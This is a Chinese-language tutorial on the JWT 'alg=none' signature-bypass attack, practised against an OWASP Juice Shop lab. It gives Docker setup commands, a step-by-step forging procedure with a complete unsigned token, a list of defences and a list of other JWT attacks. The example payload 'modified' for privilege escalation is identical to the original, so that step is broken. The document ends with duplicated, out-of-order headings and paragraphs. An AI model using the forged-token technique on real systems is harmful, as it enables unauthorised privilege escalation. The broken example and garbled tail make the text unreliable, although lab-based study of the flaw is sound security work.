JWT劫持攻击全面指南<\/h1>

1. JWT基础概念<\/h2>

1.1 什么是JWT<\/h3>
JWT(JSON Web Token)是一种紧凑的Claims声明格式，主要用于空间受限的环境进行传输，常见于HTTP授权请求头参数和URI查询参数。它将Claims转换为JSON格式，然后通过数字签名或加密进行保护。<\/p>

1.2 JWT的组成结构<\/h3>

JWT由三部分组成，用点号(.)连接：<\/p>

头部(Header)<\/strong><\/p>

包含令牌类型和加密算法<\/li>
示例：{"typ":"JWT","alg":"HS256"}<\/code><\/li>
Base64编码后：eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9<\/code><\/li> <\/ul> <\/li>
载荷(Payload)<\/strong><\/p> 包含自定义的声明信息<\/li> 示例：{"sub":"1234567890","name":"John Doe","admin":true}<\/code><\/li> Base64编码后：eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9<\/code><\/li> <\/ul> <\/li> 签名(Signature)<\/strong><\/p> 由头部+载荷+密钥通过指定算法生成<\/li> 示例：TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ<\/code><\/li> <\/ul> <\/li> <\/ol> 完整JWT示例： eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ<\/code><\/p> 2. 实验环境搭建<\/h2> 2.1 使用OWASP Juice Shop靶场<\/h3> # 拉取Owasp juice shop容器<\/span> <\/span><\/span>docker pull bkimminich\/juice-shop <\/span><\/span> <\/span><\/span># 启动容器<\/span> <\/span><\/span>docker run -d -p 3000:3000 bkimminich\/juice-shop <\/span><\/span><\/code><\/pre>访问地址：http:\/\/[IP]:3000<\/code><\/p> 2.2 创建测试账户<\/h3> 用户名：lee@163.com<\/code><\/li> 密码：123456<\/code><\/li> <\/ul> 3. JWT劫持攻击原理<\/h2> 3.1 攻击可行性分析<\/h3> 头部<\/strong>：Base64编码，可见且可操作<\/li> 载荷<\/strong>：Base64编码，可修改内容<\/li> 签名<\/strong>：依赖密钥，攻击者通常不知道<\/li> <\/ol> 关键问题<\/strong>：如何绕过签名验证？<\/p> 3.2 攻击思路<\/h3> 通过修改JWT头部中的加密算法为none<\/code>，使服务器不验证签名：<\/p> 将算法从HS256<\/code>改为none<\/code><\/li> 删除签名部分（设置为空）<\/li> 修改载荷中的权限信息<\/li> <\/ol> 4. JWT劫持攻击复现步骤<\/h2> 4.1 捕获JWT令牌<\/h3> 使用测试账户登录<\/li> 使用Burp Suite或类似工具抓包<\/li> 找到包含Authorization<\/code>头的请求<\/li> <\/ol> 示例JWT： eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ<\/code><\/p> 4.2 解码分析<\/h3> 使用在线工具解码各部分：<\/p> 头部解码<\/strong>：<\/p> { <\/span><\/span> "alg"<\/span>: "HS256"<\/span>, <\/span><\/span> "typ"<\/span>: "JWT"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>载荷解码<\/strong>：<\/p> { <\/span><\/span> "sub"<\/span>: "1234567890"<\/span>, <\/span><\/span> "name"<\/span>: "John Doe"<\/span>, <\/span><\/span> "admin"<\/span>: true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>4.3 构造攻击JWT<\/h3> 修改头部算法为none<\/code>：<\/li> <\/ol> { <\/span><\/span> "alg"<\/span>: "none"<\/span>, <\/span><\/span> "typ"<\/span>: "JWT"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>Base64编码：eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0<\/code><\/p> 修改载荷提升权限（如将admin<\/code>改为true<\/code>）<\/li> <\/ol> { <\/span><\/span> "sub"<\/span>: "1234567890"<\/span>, <\/span><\/span> "name"<\/span>: "John Doe"<\/span>, <\/span><\/span> "admin"<\/span>: true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>Base64编码：eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9<\/code><\/p> 删除签名部分，只保留头部和载荷，最后加一个点号<\/li> <\/ol> 最终攻击JWT： eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.<\/code><\/p> 4.4 发送修改后的JWT<\/h3> 将构造的JWT替换原始请求中的Authorization<\/code>头，观察是否获得提升的权限。<\/p> 5. 防御措施<\/h2> 拒绝none<\/code>算法<\/strong>：服务器应明确拒绝alg=none<\/code>的JWT<\/li> 固定算法<\/strong>：验证JWT时指定预期的算法，而不是依赖令牌中的声明<\/li> 密钥保护<\/strong>：确保签名密钥安全，不使用弱密钥<\/li> 令牌有效期<\/strong>：设置合理的过期时间<\/li> HTTPS传输<\/strong>：防止令牌在传输过程中被截获<\/li> 黑名单机制<\/strong>：对已注销的令牌进行管理<\/li> <\/ol> 6. 扩展攻击方式<\/h2> 除了none<\/code>算法攻击外，JWT还可能面临以下攻击：<\/p> 弱密钥破解<\/strong>：对HS256算法暴力破解弱密钥<\/li> 密钥混淆攻击<\/strong>：当服务端同时支持多种算法时<\/li> KID参数注入<\/strong>：操纵JWT头部中的key ID参数<\/li> JWK参数注入<\/strong>：操纵JSON Web Key参数<\/li> <\/ol> 7. 工具推荐<\/h2> jwt.io<\/strong>：在线JWT解码\/编码工具<\/li> jwt_tool<\/strong>：功能强大的JWT测试工具<\/li> Burp Suite JWT插件<\/strong>：方便修改和重放JWT<\/li> Postman<\/strong>：用于API和JWT测试<\/li> <\/ol> 通过本指南，您应该能够全面理解JWT劫持攻击的原理、实施方法和防御措施。在实际渗透测试中，请确保获得合法授权后再进行测试。<\/p>

JWT劫持攻击全面指南<\/h1>

1. JWT基础概念<\/h2>

1.1 什么是JWT<\/h3> JWT(JSON Web Token)是一种紧凑的Claims声明格式，主要用于空间受限的环境进行传输，常见于HTTP授权请求头参数和URI查询参数。它将Claims转换为JSON格式，然后通过数字签名或加密进行保护。<\/p>

3. JWT劫持攻击原理<\/h2>

4. JWT劫持攻击复现步骤<\/h2>

1.1 什么是JWT<\/h3>
JWT(JSON Web Token)是一种紧凑的Claims声明格式，主要用于空间受限的环境进行传输，常见于HTTP授权请求头参数和URI查询参数。它将Claims转换为JSON格式，然后通过数字签名或加密进行保护。<\/p>